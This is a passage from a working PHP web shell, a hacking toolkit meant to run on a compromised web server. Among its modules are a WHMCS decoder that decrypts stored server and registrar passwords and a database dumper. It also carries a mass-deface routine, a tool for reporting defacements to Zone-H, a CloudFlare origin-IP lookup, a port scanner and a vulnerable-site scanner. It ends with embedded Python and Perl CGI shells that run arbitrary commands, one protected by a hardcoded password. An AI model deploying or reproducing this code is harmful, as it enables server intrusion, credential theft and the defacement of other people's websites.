2415 document.location = 'hxxp://199.91.153.73/6le01f562ehg/6l5ep021dhvlhlq/Creating_Security_Policies_and_Implementing_Identity_Management_with_Active_Directory.pdf';
2416 </script>
2417 <?php } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'cms_detect')) { ?>
2418 <form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">
2419 <br><br><br><br><center><b><font size=4>--=[ CMS Detector ]=--</font></b></center><br><br>
2420 <?php if(!file_exists('pee.tmp')){ @fopen('pee.tmp', 'w'); echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">'; echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>'; $p = 0; if(is_readable("/var/named")){ $list = scandir("/var/named"); $current_dir = posix_getcwd(); $dir = explode("/",$current_dir); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); error_reporting(0); $link = $pageURL.'pee/'.$owner['name']; cms_add($link,$domain,$owner['name'],"WordPress"); cms_add($link,$domain,$owner['name'],"Joomla"); cms_add($link,$domain,$owner['name'],"vBulletin"); cms_add($link,$domain,$owner['name'],"WHMCS"); cms_add($link,$domain,$owner['name'],"PhpBB"); cms_add($link,$domain,$owner['name'],"MyBB"); cms_add($link,$domain,$owner['name'],"IPB"); cms_add($link,$domain,$owner['name'],"SMF"); cms_add($link,$domain,$owner['name'],"Drupal"); cms_add($link,$domain,$owner['name'],"e107"); cms_add($link,$domain,$owner['name'],"Seditio"); cms_add($link,$domain,$owner['name'],"osCommerce"); } } } }else{ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">'; echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>'; $content = file_get_contents($pageURL.'pee.tmp'); echo $content; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'jss')) { ?>
2421 <form action="?y=<?php echo $pwd; ?>&x=jss" method="post">
2422 <?php echo '
2423
2424<br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>
2425<form method="POST">
2426 <p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>
2427</form><center>
2428
2429'; @set_time_limit(0); @error_reporting(E_ALL | E_NOTICE); function check_exploit($comxx){ $link ="hxxp://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="; $result = @file_get_contents($link); if (eregi("No results",$result)) { echo"<td>Not Found</td><td><a href='hxxp://www.google.com/#hl=en&q=download+$comxx+joomla+extension'>Download</a></td></tr>"; }else{ echo"<td><a href='$link'>Found</a></td><td><=</td></tr>"; } } function check_com($url){ $source = @file_get_contents($url); preg_match_all('{option,(.*?)/}i',$source,$f); preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2); preg_match_all('{/components/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $comm){ echo "<tr><td>$comm</td>"; check_exploit($comm); } } function sec($site){ preg_match_all('{hxxp://(.*?)(/index.php)}siU',$site, $sites); if(eregi("www",$sites[0][0])){ return $site=str_replace("index.php","",$sites[0][0]); }else{ return $site=str_replace("hxxp://","hxxp://www.",str_replace("index.php","",$sites[0][0])); }} $npages = 50000; if ($_POST) { $ip = trim(strip_tags($_POST['site'])); $npage = 1; $allLinks = array(); while($npage <= $npages) { $x=@file_get_contents('hxxp://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage); if ($x) { preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU', $x, $findlink); foreach ($findlink[1] as $fl) $allLinks[]=sec($fl); $npage = $npage + 10; if (preg_match('(first=' . $npage . '&)siU', $x, $linksuiv) == 0) break; } else break; } $allDmns = array(); foreach ($allLinks as $kk => $vv){ $allDmns[] = $vv; } echo'<table border="1" width=\"80%\" align=\"center\">
2430<tr><td width=\"30%\"><b>Server IP : </b></td><td><b>'.$ip.'</b></td></tr>
2431<tr><td width=\"30%\"><b>Sites Found : </b></td><td><b>'.count(array_unique($allDmns)).'</b></td></tr>
2432</table>'; echo "<br><br>"; echo'<table border="1" width="80%" align=\"center\">'; foreach(array_unique($allDmns) as $h3h3){ echo'<tr id=new><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>'; check_com($h3h3); } echo"</table>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'dump')) { ?>
2433 <form action="?y=<?php echo $pwd; ?>&x=dump" method="post">
2434 <?php echo $head.'<p align="center">'; echo '
2435<table width=371 class=tabnet >
2436<tr><th colspan="2">Database Dump</th></tr>
2437<tr>
2438 <td>Server </td>
2439 <td><input class="inputz" type=text name=server size=52></td></tr><tr>
2440 <td>Username</td>
2441 <td><input class="inputz" type=text name=username size=52></td></tr><tr>
2442 <td>Password</td>
2443 <td><input class="inputz" type=text name=password size=52></td></tr><tr>
2444 <td>DataBase Name</td>
2445 <td><input class="inputz" type=text name=dbname size=52></td></tr>
2446 <tr>
2447 <td>DB Type </td>
2448 <td><form method=post action="'.$me.'">
2449 <select class="inputz" name=method>
2450 <option value="gzip">Gzip</option>
2451 <option value="sql">Sql</option>
2452 </select>
2453 <input class="inputzbut" type=submit value=" Dump! " ></td></tr>
2454 </form></center></table>'; if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $file = "Dump-$dbname-$date"; $method = $_POST['method']; if ($method=='sql'){ $file="Dump-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="Dump-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); } function write($data) { global $fp; if ($_POST['method']=='ssql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); }} mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='ssql'){ fclose ($fp); }else{ gzclose($fp);} header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } } elseif(isset($_GET['x']) && ($_GET['x'] == 'port-sc')) { ?>
2455 <form action="?y=<?php echo $pwd; ?>&x=port-sc" method="post">
2456 <?php echo '<br><br><center><br><b>--==[ Port Scanner ]==--</b><br>'; $start = strip_tags($_POST['start']); $end = strip_tags($_POST['end']); $host = strip_tags($_POST['host']); if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){ for($i = $start; $i<=$end; $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3); if($fp){ echo 'Port '.$i.' is <font color=green>open</font><br>'; } flush(); } }else{ echo '<table class=tabnet style="width:300px;padding:0 1px;">
2457 <input type="hidden" name="y" value="phptools">
2458 <tr><th colspan="5">Port Scanner</th></center></tr>
2459 <tr>
2460 <td>Host</td>
2461 <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="host" value="localhost"/></td>
2462 </tr>
2463 <tr>
2464 <td>Port start</td>
2465 <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="start" value="0"/></td>
2466 </tr>
2467 <tr><td>Port end</td>
2468 <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="end" value="5000"/></td>
2469 </tr><td><input class="inputzbut" type="submit" style="color:#FF0000" value="Scan Ports" />
2470 </td></form></center></table>'; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'hash')) { $submit= $_POST['enter']; if (isset($submit)) { $pass = $_POST['password']; $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; $hash = md5($pass); $md4 = hash("md4",$pass); $hash_md5 = md5($salt.$pass); $hash_md5_double = md5(sha1($salt.$pass)); $hash1 = sha1($pass); $sha256 = hash("sha256",$text); $hash1_sha1 = sha1($salt.$pass); $hash1_sha1_double = sha1(md5($salt.$pass)); } echo '<form action="" method="post"><b><table class=tabnet>'; echo '<tr><th colspan="2">Password Hash</th></center></tr>'; echo '<tr><td><b>Enter the word you want to encrypt:</b></td>'; echo '<td><input class="inputz" type="text" name="password" size="40" />'; echo '<input class="inputzbut" type="submit" name="enter" value="hash" />'; echo '</td></tr><br>'; echo '<tr><th colspan="2">Hash Result</th></center></tr>'; echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>'; echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>'; echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>'; echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>'; echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>'; echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>'; echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>'; echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>'; echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs')) { ?>
2471<form action="?y=<?php echo $pwd; ?>&x=whmcs" method="post">
2472
2473<?php function decrypt ($string,$cc_encryption_hash) { $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash); $hash_key = _hash ($key); $hash_length = strlen ($hash_key); $string = base64_decode ($string); $tmp_iv = substr ($string, 0, $hash_length); $string = substr ($string, $hash_length, strlen ($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen ($string)) { if (($c != 0 AND $c % $hash_length == 0)) { $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length)); } $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c])); ++$c; } return $out; } function _hash ($string) { if (function_exists ('sha1')) { $hash = sha1 ($string); } else { $hash = md5 ($string); } $out = ''; $c = 0; while ($c < strlen ($hash)) { $out .= chr (hexdec ($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; } echo "
2474<br><center><font size='5' color='#FF0000'><b>--==[ WHMCS Decoder ]==--</b></font></center>
2475<center>
2476<br>
2477
2478<FORM action='' method='post'>
2479<input type='hidden' name='form_action' value='2'>
2480<br>
2481<table class=tabnet style=width:320px;padding:0 1px;>
2482<tr><th colspan=2>WHMCS Decoder</th></tr>
2483<tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
2484<tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
2485<tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
2486<tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
2487<tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
2488<td> <INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:' value='Submit' name='Submit'></td>
2489</table>
2490</FORM>
2491</center>
2492"; if($_POST['form_action'] == 2 ) { $db_host=($_POST['db_host']); $db_username=($_POST['db_username']); $db_password=($_POST['db_password']); $db_name=($_POST['db_name']); $cc_encryption_hash=($_POST['cc_encryption_hash']); $link=mysql_connect($db_host,$db_username,$db_password) ; mysql_select_db($db_name,$link) ; $query = mysql_query("SELECT * FROM tblservers"); while($v = mysql_fetch_array($query)) { $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; echo("<center><table border='1'>"); $password = decrypt ($v['password'], $cc_encryption_hash); echo("<tr><td>Type</td><td>$type</td></tr>"); echo("<tr><td>Active</td><td>$active</td></tr>"); echo("<tr><td>Hostname</td><td>$hostname</td></tr>"); echo("<tr><td>Ip</td><td>$ipaddress</td></tr>"); echo("<tr><td>Username</td><td>$username</td></tr>"); echo("<tr><td>Password</td><td>$password</td></tr>"); echo "</table><br><br></center>"; } $link=mysql_connect($db_host,$db_username,$db_password) ; mysql_select_db($db_name,$link) ; $query = mysql_query("SELECT * FROM tblregistrars"); echo("<center>Domain Reseller <br><table class=tabnet border='1'>"); echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>"); while($v = mysql_fetch_array($query)) { $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt ($v['value'], $cc_encryption_hash); if ($value=="") { $value=0; } $password = decrypt ($v['password'], $cc_encryption_hash); echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>"); } } } elseif(isset($_GET['x']) && ($_GET['x'] == 'zone')) { ?>
2493<form action="?y=<?php echo $pwd; ?>&x=zone" method="post">
2494
2495<br><br><center>
2496<!-- Zone-H -->
2497<form action="" method='POST'><table><table class='tabnet'><tr>
2498<td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><h2>Zone-H</h2></th></tr></td></tr><tr><td height='45' colspan='2'><form method="post">
2499<input type="text" class="inputz" name="defacer" value="Nama Defacer" />
2500<select name="hackmode" class="inputz" >
2501<option >------------------------Choose Any------------------------</option>
2502<option value="1">Known Vulnerability (i.e. unpatched system)</option>
2503<option value="2" >Undisclosed (new) vulnerability</option>
2504<option value="3" >Configuration / Admin. Mistake</option>
2505<option value="4" >Brute Force Attack</option>
2506<option value="5" >Social Engineering</option>
2507<option value="6" >Web Server Intrusion</option>
2508<option value="7" >Web Server External Module Intrusion</option>
2509<option value="8" >Mail Server Intrusion</option>
2510<option value="9" >FTP Server Intrusion</option>
2511<option value="10" >SSH Server Intrusion</option>
2512<option value="11" >Telnet Server Intrusion</option>
2513<option value="12" >RPC Server Intrusion</option>
2514<option value="13" >Shares Misconfiguration</option>
2515<option value="14" >Other Server Intrusion</option>
2516<option value="15" >SQL Injection</option>
2517<option value="16" >URL Poisoning</option>
2518<option value="17" >File Inclusion</option>
2519<option value="18" >Other Web Application Bug</option>
2520<option value="19" >Remote Administrative Panel Access Bruteforcing</option>
2521<option value="20" >Remote Administrative Panel Access Password Guessing</option>
2522<option value="21" >Remote Administrative Panel Access Social Engineering</option>
2523<option value="22" >Attack Against Administrator(password stealing/sniffing)</option>
2524<option value="23" >Access Credentials Through Man In the Middle Attack</option>
2525<option value="24" >Remote Service Password Guessing</option>
2526<option value="25" >Remote Service Password Bruteforce</option>
2527<option value="26" >Rerouting After Attacking The Firewall</option>
2528<option value="27" >Rerouting After Attacking The Router</option>
2529<option value="28" >DNS Attack Through Social Engineering</option>
2530<option value="29" >DNS Attack Through Cache Poisoning</option>
2531<option value="30" >Not Available</option>
2532</select>
2533
2534<select name="reason" class="inputz" >
2535<option >-------------Choose Any---------------</option>
2536<option value="1" >Heh...just for fun!</option>
2537<option value="2" >Revenge against that website</option>
2538<option value="3" >Political reasons</option>
2539<option value="4" >As a challenge</option>
2540<option value="5" >I just want to be the best defacer</option>
2541<option value="6" >Patriotism</option>
2542<option value="7" >Not available</option>
2543</select>
2544<input type="hidden" name="action" value="zone">
2545<center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>
2546<br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
2547</form></td></tr></table></form>
2548<!-- End Of Zone-H -->
2549</td></center><br><br>
2550
2551<?php echo '<center>'; ob_start(); $sub = get_loaded_extensions(); if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');} $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $neden = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)){die ("[+] You Must Fill In The Attacker Name![+]");} elseif($method == "--------SELECT--------") {die("[+] You Must Select The Method![+]");} elseif($neden == "--------SELECT--------") {die("[+] You Must Select The Reason![+]");} elseif(empty($site)) {die("[+] You Must Inter the Sites List![+] ");} $i = 0; $sites = explode("\n", $site); while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "hxxp") {$sites[$i] = "hxxp://".$sites[$i];} ZoneH("hxxp://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]); echo "Site : ".$sites[$i]." Defaced !\n"; ++$i; } echo "[+] Successfully Submitted To Zone-H!! [+]"; echo '</center>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass-cf')) { echo '
2552<form method="POST"><br><br>
2553<center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">--==[ Bypass
2554<font color="#CC0000">CloudFlare</font> ]==--</font></b></p>
2555<select class="inputz" name="krz">
2556 <option>ftp</option>
2557 <option>direct-conntect</option>
2558 <option>webmail</option>
2559 <option>cpanel</option>
2560</select>
2561<input class="inputz" type="text" name="target" value="url">
2562<input class="inputzbut" type="submit" value="Bypass"></center>
2563
2564'; $target = $_POST['target']; if($_POST['krz'] == "ftp") { $ftp = gethostbyname("ftp."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
2565ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>"; } if($_POST['krz'] == "direct-conntect") { $direct = gethostbyname("direct-connect."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
2566ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>"; } if($_POST['krz'] == "webmail") { $web = gethostbyname("webmail."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
2567ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>"; } if($_POST['krz'] == "cpanel") { $cpanel = gethostbyname("cpanel."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
2568ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'hashid')) { if(isset($_POST['gethash'])){ $hash = $_POST['hash']; if(strlen($hash)==32){ $hashresult = "MD5 Hash"; }elseif(strlen($hash)==40){ $hashresult = "SHA-1 Hash/ /MySQL5 Hash"; }elseif(strlen($hash)==13){ $hashresult = "DES(Unix) Hash"; }elseif(strlen($hash)==16){ $hashresult = "MySQL Hash / /DES(Oracle Hash)"; }elseif(strlen($hash)==41){ $GetHashChar = substr($hash, 40); if($GetHashChar == "*"){ $hashresult = "MySQL5 Hash"; } }elseif(strlen($hash)==64){ $hashresult = "SHA-256 Hash"; }elseif(strlen($hash)==96){ $hashresult = "SHA-384 Hash"; }elseif(strlen($hash)==128){ $hashresult = "SHA-512 Hash"; }elseif(strlen($hash)==34){ if(strstr($hash, '$1$')){ $hashresult = "MD5(Unix) Hash"; } }elseif(strlen($hash)==37){ if(strstr($hash, '$apr1$')){ $hashresult = "MD5(APR) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$H$')){ $hashresult = "MD5(phpBB3) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$P$')){ $hashresult = "MD5(Wordpress) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$5$')){ $hashresult = "SHA-256(Unix) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$6$')){ $hashresult = "SHA-512(Unix) Hash"; } }elseif(strlen($hash)==24){ if(strstr($hash, '==')){ $hashresult = "MD5(Base-64) Hash"; } }else{ $hashresult = "Hash type not found"; } }else{ $hashresult = "No Hash Entered"; } ?>
2569 <center><br><Br><br>
2570
2571 <form action="" method="POST">
2572 <tr>
2573 <table class="tabnet">
2574 <th colspan="5">Hash Identification</th>
2575 <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
2576 <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
2577 </table></tr></form>
2578 </center>
2579
2580 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'python')) { echo "<center/><br/><b>
2581 --==[ Python Bypass Exploit ]==--
2582 </b><br><br>"; mkdir('python', 0755); chdir('python'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!"); $metin = "AddHandler cgi-script .izo"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $pythonp = '#!/usr/bin/python
2583# 07-07-04
2584# v1.0.0
2585
2586# cgi-shell.py
2587# A simple CGI that executes arbitrary shell commands.
2588
2589
2590# Copyright Michael Foord
2591# You are free to modify, use and relicense this code.
2592
2593# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
2594# Use at your own risk !!!
2595
2596# E-mail michael AT foord DOT me DOT uk
2597# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
2598
2599"""
2600A simple CGI script to execute shell commands via CGI.
2601"""
2602################################################################
2603# Imports
2604try:
2605 import cgitb; cgitb.enable()
2606except:
2607 pass
2608import sys, cgi, os
2609sys.stderr = sys.stdout
2610from time import strftime
2611import traceback
2612from StringIO import StringIO
2613from traceback import print_exc
2614
2615################################################################
2616# constants
2617
2618fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
2619versionstring = 'Version 1.0.0 7th July 2004'
2620
2621if os.environ.has_key("SCRIPT_NAME"):
2622 scriptname = os.environ["SCRIPT_NAME"]
2623else:
2624 scriptname = ""
2625
2626METHOD = '"POST"'
2627
2628################################################################
2629# Private functions and variables
2630
2631def getform(valuelist, theform, notpresent=''):
2632 """This function, given a CGI form, extracts the data from it, based on
2633 valuelist passed in. Any non-present values are set to '' - although this can be changed.
2634 (e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
2635 data = {}
2636 for field in valuelist:
2637 if not theform.has_key(field):
2638 data[field] = notpresent
2639 else:
2640 if type(theform[field]) != type([]):
2641 data[field] = theform[field].value
2642 else:
2643 values = map(lambda x: x.value, theform[field]) # allows for list type values
2644 data[field] = values
2645 return data
2646
2647
2648theformhead = """<HTML><HEAD><TITLE>cgi-shell.py - a CGI by Fuzzyman</TITLE></HEAD>
2649<BODY><CENTER>
2650<H1>Welcome to cgi-shell.py - <BR>a Python CGI</H1>
2651<B><I>By Fuzzyman</B></I><BR>
2652"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'.</CENTER><BR>'
2653
2654theform = """<H2>Enter Command</H2>
2655<FORM METHOD=\"""" + METHOD + '" action="' + scriptname + """\">
2656<input name=cmd type=text><BR>
2657<input type=submit value="Submit"><BR>
2658</FORM><BR><BR>"""
2659bodyend = '</BODY></HTML>'
2660errormess = '<CENTER><H2>Something Went Wrong</H2><BR><PRE>'
2661
2662################################################################
2663# main body of the script
2664
2665if __name__ == '__main__':
2666 print "Content-type: text/html" # this is the header to the server
2667 print # so is this blank line
2668 form = cgi.FieldStorage()
2669 data = getform(['cmd'],form)
2670 thecmd = data['cmd']
2671 print theformhead
2672 print theform
2673 if thecmd:
2674 print '<HR><BR><BR>'
2675 print '<B>Command : ', thecmd, '<BR><BR>'
2676 print 'Result : <BR><BR>'
2677 try:
2678 child_stdin, child_stdout = os.popen2(thecmd)
2679 child_stdin.close()
2680 result = child_stdout.read()
2681 child_stdout.close()
2682 print result.replace('\n', '<BR>')
2683
2684 except Exception, e: # an error in executing the command
2685 print errormess
2686 f = StringIO()
2687 print_exc(file=f)
2688 a = f.getvalue().splitlines()
2689 for line in a:
2690 print line
2691
2692 print bodyend
2693
2694
2695"""
2696TODO/ISSUES
2697
2698
2699
2700CHANGELOG
2701
270207-07-04 Version 1.0.0
2703A very basic system for executing shell commands.
2704I may expand it into a proper 'environment' with session persistence...
2705"""'; $file = fopen("python.izo" ,"w+"); $write = fwrite ($file ,base64_decode($pythonp)); fclose($file); chmod("python.izo",0755); echo " <iframe src=python/python.izo width=96% height=76% frameborder=0></iframe>
2706
2707 </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){ $text = $_POST['code']; ?><center><br><br><b>--==[ Script Encode & Decode ]==--</b><br><br>
2708<form method="post"><br><br><br>
2709<textarea class='inputz' cols=80 rows=10 name="code"></textarea><br><br>
2710<select class='inputz' size="1" name="ope">
2711<option value="base64">Base64</option>
2712<option value="gzinflate">str_rot13 - gzinflate - base64</option>
2713<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
2714</select> <input class='inputzbut' type='submit' name='submit' value='Encrypt'>
2715<input class='inputzbut' type='submit' name='submits' value='Decrypt'>
2716</form>
2717
2718<?php $submit = $_POST['submit']; if (isset($submit)){ $op = $_POST["ope"]; switch ($op) {case 'base64': $codi=base64_encode($text); break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text))))); break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text))); break;default:break;}} $submit = $_POST['submits']; if (isset($submit)){ $op = $_POST["ope"]; switch ($op) {case 'base64': $codi=base64_decode($text); break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text))))); break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text))); break;default:break;}} echo '<textarea cols=80 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')) { echo "<center/><br/><b><font color=#FF0000>--==[ Mass Deface ]==--</font></b><br>"; error_reporting(0);?>
2719<form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
2720<td><table><table class="tabnet" >
2721<form hethot='post'>
2722<tr>
2723 <tr>
2724 <td> Folder</td><td><input class ='inputz' type='text' name='path' size='60' value="<?php echo getcwd();?>"></td>
2725 </tr><br>
2726 <tr>
2727 <td>File N</td><td><input class ='inputz' type='text' name='file' size='60' value="index.php"></td>
2728 </tr>
2729</tr>
2730<th colspan='2'><b>Index Code</b></th><br></table>
2731<textarea style='background:black;outline:none;' name='index' rows='10' cols='67'>r00t.info A</textarea><br>
2732<center><input class='inputzbut' type='submit' value=" Deface "></center></form></table><br></form>
2733
2734<?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'cgi')) { echo "<center/><br/><b><font color=blue>--==[ cgitelnet.v1 Bypass Exploit]==--</font></b><br><br>"; mkdir('cgitelnet1', 0755); chdir('cgitelnet1'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!"); $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
2735
2736AddType application/x-hxxpd-cgi .cin
2737
2738AddHandler cgi-script .cin
2739AddHandler cgi-script .cin"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $cgishellizocin = '#!/usr/bin/perl -I/usr/local/bandmin
2740use MIME::Base64;
2741$Version= "CGI-Telnet Version 1.3";
2742$EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'>r00t.info - CGI-Telnet</font>";
2743
2744$Password = "r00t.info"; # Change this. You will need to enter this
2745 # to login.
2746sub Is_Win(){
2747 $os = &trim($ENV{"SERVER_SOFTWARE"});
2748 if($os =~ m/win/i){
2749 return 1;
2750 }
2751 else{
2752 return 0;
2753 }
2754}
2755$WinNT = &Is_Win(); # You need to change the value of this to 1 if
2756 # you're running this script on a Windows NT
2757 # machine. If you're running it on Unix, you
2758 # can leave the value as it is.
2759
2760$NTCmdSep = "&"; # This character is used to seperate 2 commands
2761 # in a command line on Windows NT.
2762
2763$UnixCmdSep = ";"; # This character is used to seperate 2 commands
2764 # in a command line on Unix.
2765
2766$CommandTimeoutDuration = 10000; # Time in seconds after commands will be killed
2767 # Don't set this to a very large value. This is
2768 # useful for commands that may hang or that
2769 # take very long to execute, like "find /".
2770 # This is valid only on Unix servers. It is
2771 # ignored on NT Servers.
2772
2773$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
2774 # browser as soon as it is output, otherwise
2775 # it is buffered and send when the command
2776 # completes. This is useful for commands like
